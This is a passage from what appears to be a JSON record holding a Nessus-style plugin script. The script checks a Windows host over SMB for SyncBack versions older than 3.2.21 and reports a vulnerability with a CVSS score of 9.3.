'SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName' KB items are missing.\");\n\nkey = NULL;\nforeach name (keys(list))\n{\n prod = list[name];\n if (prod && \"SyncBack\" >< prod)\n {\n key = ereg_replace(pattern:\"^SMB\\/Registry\\/HKLM\\/(SOFTWARE\\/Microsoft\\/Windows\\/CurrentVersion\\/Uninstall\\/.+)\\/DisplayName$\", replace:\"\\1\", string:name);\n key = str_replace(find:\"/\", replace:\"\\\", string:key);\n break;\n }\n}\nif(isnull(key)) exit(0, \"No evidence of SyncBack is found in the Uninstaller's registry hive.\");\n\n\n# Connect to the appropriate share.\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(1, \"The 'SMB/Registry/Enumerated' KB item is missing.\");\nname = kb_smb_name();\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n exit(1, \"Can't connect to IPC$ share.\");\n}\n\n\n# Connect to remote registry.\nhklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);\nif (isnull(hklm))\n{\n NetUseDel();\n exit(1, \"Can't connect to remote registry.\");\n}\n\n\n# Check whether it's installed.\npath = NULL;\n\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n value = RegQueryValue(handle:key_h, item:\"InstallLocation\");\n if (!isnull(value))\n {\n path = value[1];\n path = ereg_replace(pattern:\"^(.+)\\\\$\", replace:\"\\1\", string:path);\n }\n\n RegCloseKey(handle:key_h);\n}\n\nRegCloseKey(handle:hklm);\nif (isnull(path))\n{\n NetUseDel();\n exit(0, \"Can't find SyncBack's installation directory.\");\n}\n\n\n# Check the version of the main exe.\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:path);\nexe = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\SyncBack.exe\", string:path);\nNetUseDel(close:FALSE);\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif (rc != 1)\n{\n NetUseDel();\n exit(1, \"Can't connect to '\"+share+\"' share.\");\n}\n\nfh = CreateFile(\n file:exe,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n);\nver = NULL;\nif (!isnull(fh))\n{\n ver = GetFileVersion(handle:fh);\n CloseFile(handle:fh);\n}\nelse\n{\n NetUseDel();\n exit(0, \"Failed to open '\"+path+\"\\SyncBack.exe'.\");\n}\nNetUseDel();\n\n\n# Check the version number.\nif (!isnull(ver))\n{\n version = string(ver[0], \".\", ver[1], \".\", ver[2]);\n fixed_version = \"3.2.21\";\n\n if (ver[0] < 3 || (ver[0] == 3 && ver[1] < 2) || (ver[0] == 3 && ver[1] == 2 && ver[2] < 21))\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n exit(0, \"SyncBack version \"+version+\" is installed and not vulnerable.\");\n}\nelse exit(1, \"Can't get file version of '\"+(share-'$')+':'+exe+\"'.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
